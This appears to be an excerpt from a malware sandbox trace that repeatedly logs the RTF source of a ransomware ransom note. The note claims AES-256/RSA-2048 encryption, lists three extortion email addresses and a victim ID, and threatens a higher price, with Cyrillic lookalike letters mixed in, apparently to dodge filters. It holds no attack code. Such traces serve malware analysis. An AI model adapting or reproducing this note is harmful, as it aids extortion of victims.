fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.550] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, 